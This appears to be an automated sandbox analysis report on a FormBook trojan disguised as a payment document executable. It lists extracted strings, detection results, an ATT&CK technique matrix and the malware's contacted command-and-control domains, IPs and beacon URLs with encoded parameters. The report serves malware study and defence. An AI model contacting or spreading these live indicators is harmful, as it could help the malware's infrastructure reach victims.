0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Binary or memory string: WIN_XPe
Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Binary or memory string: WIN_VISTA
Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Binary or memory string: WIN_7
Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1892529323.00000000034D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4152321363.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4152036800.0000000000DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4153003564.00000000034F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1892185335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4153026334.0000000003BB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1893024152.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_00961204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		0_2_00961204
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_00961806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00961806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	241 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	12 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	76%	ReversingLabs	Win32.Trojan.AutoitInject
Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	36%	Virustotal		Browse
Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	100%	Avira	DR/AutoIt.Gen8
Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.u75lmwdgp0du.homes/8m3y/?idTDev6P=+b9jpUpgOBw1R1sbmQNUSLWfWziv1WHHOphGnZ74l6djh+VypXV/SxbEO3x3Zf/CAjSFfUkl5YWJ6O7zhki1CEr+PCryGvo+//4gSAtBEtsQDlqalgX6+sA=&z2=LHT8eHbp3J	0%	Avira URL Cloud	safe
https://www.myfastuploader.sbs/y3ui/?idTDev6P=D47F9HanQoviz063Kla	0%	Avira URL Cloud	safe
http://www.myfastuploader.sbs/y3ui/	0%	Avira URL Cloud	safe
http://www.811371bb10.buzz/ucix/	100%	Avira URL Cloud	malware
http://www.grimbo.boats/mjs1/?z2=LHT8eHbp3J&idTDev6P=GVh/hhHQVOm9lJhlnTwGtMkA4ymI5xMQHRopTNiRBkRajOiXgFH58ym0SPrYjBew4tr59NxCEDwYQ85isvQk4xM/x/d5q69NU5cNgbKFIutrK5EtJTwwV9w=	0%	Avira URL Cloud	safe
http://www.tabyscooterrentals.xyz/l5cx/?idTDev6P=yQJKkfxWdg40vhwN6z0cv3Re74y0hoes8gKbzV8myB83hLOXrLVtbOGyahZiWqLsl6rE8IHzhGOG+V3nBGIGQZ1Tpj+VkeU09FX8TcyzM38BEJG/9zYR/HY=&z2=LHT8eHbp3J	0%	Avira URL Cloud	safe
http://www.ogbos88.cyou/q1v9/?idTDev6P=metx3mUju98G7hAYbLi4XsmUgHwdedXXJmBU5YhJIGTDaOPtkjQkc7gqohOsrca8eeiGHEfgIoNXOYbhhBmf7T3N/CIVyK6RIDDiNH4cRPg0hdY8uXiShr8=&z2=LHT8eHbp3J	0%	Avira URL Cloud	safe
http://www.sesanu.xyz/rf25/?idTDev6P=7K/WA23tcmDFyzNLMn/EpU9MVXFD0cPmQwJwfw98BfkTBnsrTY46HewHDC14kj2B/CLZPuq7EXqCGidtAJMC1i5W2RZanfRuX6/plfhQnf3YS6vnQQobeR4=&z2=LHT8eHbp3J	0%	Avira URL Cloud	safe
http://www.sesanu.xyz/rf25/	0%	Avira URL Cloud	safe
https://ogbos88vip.click	0%	Avira URL Cloud	safe
http://www.ogbos88.cyou/q1v9/	0%	Avira URL Cloud	safe
http://www.zucchini.pro/ajra/?idTDev6P=2p4airO795Dn7gjI0Dv91awJZZT6XeJxn45z7/EQvQ5Z540aLfhYPACGMudBmeh/HdMergqqhhWIcIC0VgXLt2IUp0UaNuBDF/7fv0VCCEc7XsfSWpnh1zI=&z2=LHT8eHbp3J	100%	Avira URL Cloud	malware
http://www.esscosaathi.info/u8xw/	0%	Avira URL Cloud	safe
http://www.u75lmwdgp0du.homes	0%	Avira URL Cloud	safe
http://www.sovz.pro/vwha/	0%	Avira URL Cloud	safe
http://www.u75lmwdgp0du.homes/8m3y/	0%	Avira URL Cloud	safe
http://www.sql.dance/gott/	0%	Avira URL Cloud	safe
http://www.esscosaathi.info/u8xw/?z2=LHT8eHbp3J&idTDev6P=i8gXCJLEz0m1jkVC3VXAcNUKqrLt4taQegcb3nUsXOZ4n5/i1i4bc9in+BhRQDpL1rpCirHyU+hVzoSxv42EL87/iV5cEHcZkG+VUFy3lql/kPGuEhgf21E=	0%	Avira URL Cloud	safe
http://www.rtp189z.lat/csd1/?z2=LHT8eHbp3J&idTDev6P=0h3WwWevRNaqBPz/dW1li3QIq8Phv/5H4GvN+jOYSYvv/wPW0ZZUjDEdN12hCkheLADdXdQ+boBHPC0vEe57VjJjxQ++03TYD8RIhl0tg+o7+6xEQ/Px7iI=	0%	Avira URL Cloud	safe
http://www.tabyscooterrentals.xyz/l5cx/	0%	Avira URL Cloud	safe
http://www.myfastuploader.sbs/y3ui/?idTDev6P=D47F9HanQoviz063Kla+uXJoUZ9Xkn5EFykOP0gieBCBMXnJAqL7dT9IMNT9u2QvL1nqZZA8LUwsGl6iuyQexR6UeFArqVG6bzfyBJ63IAhlWCOyYqCEOzA=&z2=LHT8eHbp3J	0%	Avira URL Cloud	safe
http://www.sovz.pro/vwha/?z2=LHT8eHbp3J&idTDev6P=+1TlPe1iHurJgrUv/lhWkNYBQhwaVohjaWb71SZDhLRDbzxX1n644MdDCZJQOu7CS35CxiD5o0aG0rIRj2YKEgG9LzsexELnrvNTZ6WsCe6wz+oUbTnhz6U=	0%	Avira URL Cloud	safe
http://www.grimbo.boats/mjs1/	0%	Avira URL Cloud	safe
http://www.rtp189z.lat/csd1/	0%	Avira URL Cloud	safe
http://www.sql.dance/gott/?z2=LHT8eHbp3J&idTDev6P=6kpJ6LpNwGTQjQFo3QTaoLrj/KP09pa+dbP4DmTHwDi6SRHyD6uQyy/krsAgEdDgCRluenpg23EjeT8+1f7IhrL8LPD7Y+8AZWFZ/qadVKHEgd+qnz3Eias=	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
rtp189z.lat	68.65.122.71	true	true	unknown
www.sovz.pro	45.130.41.107	true	true	unknown
www.sql.dance	199.59.243.228	true	true	unknown
www.sesanu.xyz	199.192.21.169	true	true	unknown
www.zucchini.pro	199.59.243.228	true	true	unknown
tc142-site01.mac-cdn.net	103.174.136.137	true	true	unknown
www.esscosaathi.info	15.197.240.20	true	true	unknown
www.grimbo.boats	104.21.18.171	true	false	high
myfastuploader.sbs	136.243.225.5	true	true	unknown
www.ogbos88.cyou	104.21.13.141	true	true	unknown
natroredirect.natrocdn.com	85.159.66.93	true	false	high
ns91.l4y.cn	38.22.89.164	true	true	unknown
www.myfastuploader.sbs	unknown	unknown	false	unknown
www.glyttera.shop	unknown	unknown	false	unknown
www.tabyscooterrentals.xyz	unknown	unknown	true	unknown
www.usps-infora.top	unknown	unknown	false	unknown
www.u75lmwdgp0du.homes	unknown	unknown	false	unknown
www.rtp189z.lat	unknown	unknown	false	unknown
www.yacolca.digital	unknown	unknown	false	unknown
www.811371bb10.buzz	unknown	unknown	false	unknown
www.biocaracol.online	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.sesanu.xyz/rf25/	true	Avira URL Cloud: safe	unknown
http://www.sesanu.xyz/rf25/?idTDev6P=7K/WA23tcmDFyzNLMn/EpU9MVXFD0cPmQwJwfw98BfkTBnsrTY46HewHDC14kj2B/CLZPuq7EXqCGidtAJMC1i5W2RZanfRuX6/plfhQnf3YS6vnQQobeR4=&z2=LHT8eHbp3J	true	Avira URL Cloud: safe	unknown
http://www.myfastuploader.sbs/y3ui/	true	Avira URL Cloud: safe	unknown
http://www.u75lmwdgp0du.homes/8m3y/?idTDev6P=+b9jpUpgOBw1R1sbmQNUSLWfWziv1WHHOphGnZ74l6djh+VypXV/SxbEO3x3Zf/CAjSFfUkl5YWJ6O7zhki1CEr+PCryGvo+//4gSAtBEtsQDlqalgX6+sA=&z2=LHT8eHbp3J	true	Avira URL Cloud: safe	unknown
http://www.ogbos88.cyou/q1v9/?idTDev6P=metx3mUju98G7hAYbLi4XsmUgHwdedXXJmBU5YhJIGTDaOPtkjQkc7gqohOsrca8eeiGHEfgIoNXOYbhhBmf7T3N/CIVyK6RIDDiNH4cRPg0hdY8uXiShr8=&z2=LHT8eHbp3J	true	Avira URL Cloud: safe	unknown
http://www.grimbo.boats/mjs1/?z2=LHT8eHbp3J&idTDev6P=GVh/hhHQVOm9lJhlnTwGtMkA4ymI5xMQHRopTNiRBkRajOiXgFH58ym0SPrYjBew4tr59NxCEDwYQ85isvQk4xM/x/d5q69NU5cNgbKFIutrK5EtJTwwV9w=	true	Avira URL Cloud: safe	unknown
http://www.811371bb10.buzz/ucix/	true	Avira URL Cloud: malware	unknown
http://www.tabyscooterrentals.xyz/l5cx/?idTDev6P=yQJKkfxWdg40vhwN6z0cv3Re74y0hoes8gKbzV8myB83hLOXrLVtbOGyahZiWqLsl6rE8IHzhGOG+V3nBGIGQZ1Tpj+VkeU09FX8TcyzM38BEJG/9zYR/HY=&z2=LHT8eHbp3J	true	Avira URL Cloud: safe	unknown
http://www.esscosaathi.info/u8xw/	true	Avira URL Cloud: safe	unknown
http://www.ogbos88.cyou/q1v9/	true	Avira URL Cloud: safe	unknown
http://www.zucchini.pro/ajra/?idTDev6P=2p4airO795Dn7gjI0Dv91awJZZT6XeJxn45z7/EQvQ5Z540aLfhYPACGMudBmeh/HdMergqqhhWIcIC0VgXLt2IUp0UaNuBDF/7fv0VCCEc7XsfSWpnh1zI=&z2=LHT8eHbp3J	true	Avira URL Cloud: malware	unknown
http://www.rtp189z.lat/csd1/?z2=LHT8eHbp3J&idTDev6P=0h3WwWevRNaqBPz/dW1li3QIq8Phv/5H4GvN+jOYSYvv/wPW0ZZUjDEdN12hCkheLADdXdQ+boBHPC0vEe57VjJjxQ++03TYD8RIhl0tg+o7+6xEQ/Px7iI=	true	Avira URL Cloud: safe	unknown
http://www.sovz.pro/vwha/	true	Avira URL Cloud: safe	unknown
http://www.esscosaathi.info/u8xw/?z2=LHT8eHbp3J&idTDev6P=i8gXCJLEz0m1jkVC3VXAcNUKqrLt4taQegcb3nUsXOZ4n5/i1i4bc9in+BhRQDpL1rpCirHyU+hVzoSxv42EL87/iV5cEHcZkG+VUFy3lql/kPGuEhgf21E=	true	Avira URL Cloud: safe	unknown
http://www.u75lmwdgp0du.homes/8m3y/	true	Avira URL Cloud: safe	unknown
http://www.tabyscooterrentals.xyz/l5cx/	true	Avira URL Cloud: safe	unknown
http://www.sql.dance/gott/	true	Avira URL Cloud: safe	unknown
http://www.myfastuploader.sbs/y3ui/?idTDev6P=D47F9HanQoviz063Kla+uXJoUZ9Xkn5EFykOP0gieBCBMXnJAqL7dT9IMNT9u2QvL1nqZZA8LUwsGl6iuyQexR6UeFArqVG6bzfyBJ63IAhlWCOyYqCEOzA=&z2=LHT8eHbp3J	true	Avira URL Cloud: safe	unknown
http://www.sovz.pro/vwha/?z2=LHT8eHbp3J&idTDev6P=+1TlPe1iHurJgrUv/lhWkNYBQhwaVohjaWb71SZDhLRDbzxX1n644MdDCZJQOu7CS35CxiD5o0aG0rIRj2YKEgG9LzsexELnrvNTZ6WsCe6wz+oUbTnhz6U=	true	Avira URL Cloud: safe	unknown
http://www.grimbo.boats/mjs1/	true	Avira URL Cloud: safe	unknown
http://www.rtp189z.lat/csd1/	true	Avira URL Cloud: safe	unknown
http://www.sql.dance/gott/?z2=LHT8eHbp3J&idTDev6P=6kpJ6LpNwGTQjQFo3QTaoLrj/KP09pa+dbP4DmTHwDi6SRHyD6uQyy/krsAgEdDgCRluenpg23EjeT8+1f7IhrL8LPD7Y+8AZWFZ/qadVKHEgd+qnz3Eias=	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	w32tm.exe, 00000003.00000002.4155927747.00000000081DE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	w32tm.exe, 00000003.00000002.4155927747.00000000081DE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	w32tm.exe, 00000003.00000002.4155927747.00000000081DE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.myfastuploader.sbs/y3ui/?idTDev6P=D47F9HanQoviz063Kla	w32tm.exe, 00000003.00000002.4153951411.0000000004ACE000.00000004.10000000.00040000.00000000.sdmp, vtTdsKSTqQr.exe, 00000007.00000002.4153236722.000000000356E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	w32tm.exe, 00000003.00000002.4155927747.00000000081DE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ogbos88vip.click	w32tm.exe, 00000003.00000002.4153951411.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, vtTdsKSTqQr.exe, 00000007.00000002.4153236722.000000000324A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	w32tm.exe, 00000003.00000002.4155927747.00000000081DE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	w32tm.exe, 00000003.00000002.4155927747.00000000081DE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com	w32tm.exe, 00000003.00000002.4153951411.00000000052A8000.00000004.10000000.00040000.00000000.sdmp, w32tm.exe, 00000003.00000002.4155777981.0000000006790000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 00000003.00000002.4153951411.0000000004486000.00000004.10000000.00040000.00000000.sdmp, vtTdsKSTqQr.exe, 00000007.00000002.4153236722.0000000002F26000.00000004.00000001.00040000.00000000.sdmp, vtTdsKSTqQr.exe, 00000007.00000002.4153236722.0000000003D48000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2253315519.00000000407D6000.00000004.80000000.00040000.00000000.sdmp	false		high
http://www.u75lmwdgp0du.homes	vtTdsKSTqQr.exe, 00000007.00000002.4154787819.0000000004E8C000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	w32tm.exe, 00000003.00000002.4155927747.00000000081DE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	w32tm.exe, 00000003.00000002.4155927747.00000000081DE000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
136.243.225.5	myfastuploader.sbs	Germany	24940	HETZNER-ASDE	true
104.21.18.171	www.grimbo.boats	United States	13335	CLOUDFLARENETUS	false
199.192.21.169	www.sesanu.xyz	United States	22612	NAMECHEAP-NETUS	true
15.197.240.20	www.esscosaathi.info	United States	7430	TANDEMUS	true
104.21.13.141	www.ogbos88.cyou	United States	13335	CLOUDFLARENETUS	true
199.59.243.228	www.sql.dance	United States	395082	BODIS-NJUS	true
38.22.89.164	ns91.l4y.cn	United States	21624	CYBERLYNK-PHXUS	true
45.130.41.107	www.sovz.pro	Russian Federation	198610	BEGET-ASRU	true
85.159.66.93	natroredirect.natrocdn.com	Turkey	34619	CIZGITR	false
103.174.136.137	tc142-site01.mac-cdn.net	unknown	7575	AARNET-AS-APAustralianAcademicandResearchNetworkAARNe	true
68.65.122.71	rtp189z.lat	United States	22612	NAMECHEAP-NETUS	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1589911
Start date and time:	2025-01-13 10:17:59 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 35s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/2@17/11
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 94% Number of executed functions: 44 Number of non-executed functions: 301
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 172.202.163.200, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target vtTdsKSTqQr.exe, PID 4948 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Simulations

Behavior and APIs

Time	Type	Description
04:19:47	API Interceptor	10992260x Sleep call for process: w32tm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
136.243.225.5	4p5XLVXJnq.exe	Get hash	malicious	FormBook	Browse	www.myfastuploader.sbs/wzdf/
	SLq0ulC3Wf.exe	Get hash	malicious	FormBook	Browse	www.myfastuploader.sbs/wzdf/
	rHP_SCAN_DOCUME.exe	Get hash	malicious	FormBook	Browse	www.myfastuploader.sbs/y3ui/
104.21.18.171	smQoKNkwB7.exe	Get hash	malicious	FormBook	Browse	www.grimbo.boats/ej4l/
	PO_62401394_MITech_20250601.exe	Get hash	malicious	FormBook	Browse	www.grimbo.boats/kxtt/
	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	www.grimbo.boats/kxtt/
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	www.grimbo.boats/kxtt/
	SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Get hash	malicious	FormBook	Browse	www.fuugiti.xyz/aet3/?l48p=ETTjY0N9an1X8aIG5qXNacvciRNZbdUKCcrOLt6RrRurIWhPmRExX4B7f0/al7kq5FJE&vHn=5j90bfXx9vsx
199.192.21.169	CSZ inquiry for MH raw material.exe	Get hash	malicious	FormBook	Browse	www.lonfor.website/bowc/
	plZuPtZoTk.exe	Get hash	malicious	FormBook	Browse	www.astrafusion.xyz/pcck/
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	www.bokus.site/qps0/
	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	www.bokus.site/qps0/
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	www.bokus.site/qps0/
	ORDER REF 47896798 PSMCO.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.solidf.xyz/stho/
	DHL DOCS 2-0106-25.exe	Get hash	malicious	FormBook	Browse	www.lonfor.website/stiu/
	PO_62401394_MITech_20250601.exe	Get hash	malicious	FormBook	Browse	www.lonfor.website/bowc/
	rHP_SCAN_DOCUME.exe	Get hash	malicious	FormBook	Browse	www.sesanu.xyz/rf25/
	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	www.lonfor.website/bowc/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.grimbo.boats	CSZ inquiry for MH raw material.exe	Get hash	malicious	FormBook	Browse	172.67.182.198
	gH3LlhcRzg.exe	Get hash	malicious	FormBook	Browse	172.67.182.198
	FG5wHs4fVX.exe	Get hash	malicious	FormBook	Browse	104.21.18.171
	smQoKNkwB7.exe	Get hash	malicious	FormBook	Browse	104.21.18.171
	PO_62401394_MITech_20250601.exe	Get hash	malicious	FormBook	Browse	104.21.18.171
	rHP_SCAN_DOCUME.exe	Get hash	malicious	FormBook	Browse	172.67.182.198
	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	104.21.18.171
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	104.21.18.171
	inv#12180.exe	Get hash	malicious	FormBook	Browse	172.67.182.198
	CJE003889.exe	Get hash	malicious	FormBook	Browse	172.67.182.198
www.sql.dance	J1VpshZJfm.exe	Get hash	malicious	FormBook	Browse	199.59.243.228
	rHP_SCAN_DOCUME.exe	Get hash	malicious	FormBook	Browse	199.59.243.228
	bestimylover.hta	Get hash	malicious	Cobalt Strike, FormBook, HTMLPhisher	Browse	199.59.243.227
tc142-site01.mac-cdn.net	rHP_SCAN_DOCUME.exe	Get hash	malicious	FormBook	Browse	103.174.136.137
www.esscosaathi.info	rHP_SCAN_DOCUME.exe	Get hash	malicious	FormBook	Browse	15.197.240.20
www.sovz.pro	rHP_SCAN_DOCUME.exe	Get hash	malicious	FormBook	Browse	45.130.41.107
www.sesanu.xyz	rHP_SCAN_DOCUME.exe	Get hash	malicious	FormBook	Browse	199.192.21.169
www.zucchini.pro	rHP_SCAN_DOCUME.exe	Get hash	malicious	FormBook	Browse	199.59.243.228

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HETZNER-ASDE	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	trow.exe	Get hash	malicious	Unknown	Browse	144.76.24.9
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	https://mrohailkhan.com/energyaustralia/auth/auhs1/	Get hash	malicious	Unknown	Browse	138.201.222.163
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
CLOUDFLARENETUS	QUOTATION#090125-ELITEMARINE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.80.1
	Order_list.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.64.1
	Receipt-2502-AJL2024.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	invnoIL438805.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	g6.elf	Get hash	malicious	Unknown	Browse	1.1.1.1
	http://communication.investecprivatebank.co.za/Marketing/DocFusion/Headers/PBHeaderBanner.jpg	Get hash	malicious	Unknown	Browse	104.21.96.1
	CSZ inquiry for MH raw material.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	g3.elf	Get hash	malicious	Unknown	Browse	1.1.1.1
	1001-13.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
TANDEMUS	http://ledger-recovery.co.uk/	Get hash	malicious	Unknown	Browse	15.197.193.217
	https://ledger-recovery.co.uk/public	Get hash	malicious	Unknown	Browse	15.197.193.217
	res.sh4.elf	Get hash	malicious	Unknown	Browse	128.88.223.198
	http://www.rebrand.ly/business-page-994/	Get hash	malicious	Unknown	Browse	15.197.137.111
	QsBdpe1gK5.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	15.197.142.173
	n2pGr8w21V.exe	Get hash	malicious	FormBook	Browse	15.197.148.33
	http://www.lpb.gov.lr	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	15.197.152.159
	https://red.travelglobeimmigration.com	Get hash	malicious	Unknown	Browse	15.197.240.20
	https://we.tl/t-fnebgmrnYQ	Get hash	malicious	Unknown	Browse	15.197.193.217
	http://www.singhs.lv	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	15.197.152.159
NAMECHEAP-NETUS	CSZ inquiry for MH raw material.exe	Get hash	malicious	FormBook	Browse	199.192.21.169
	1001-13.exe	Get hash	malicious	FormBook	Browse	162.0.236.169
	QsBdpe1gK5.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	199.192.23.123
	rACq8Eaix6.exe	Get hash	malicious	FormBook	Browse	199.192.23.123
	plZuPtZoTk.exe	Get hash	malicious	FormBook	Browse	199.192.21.169
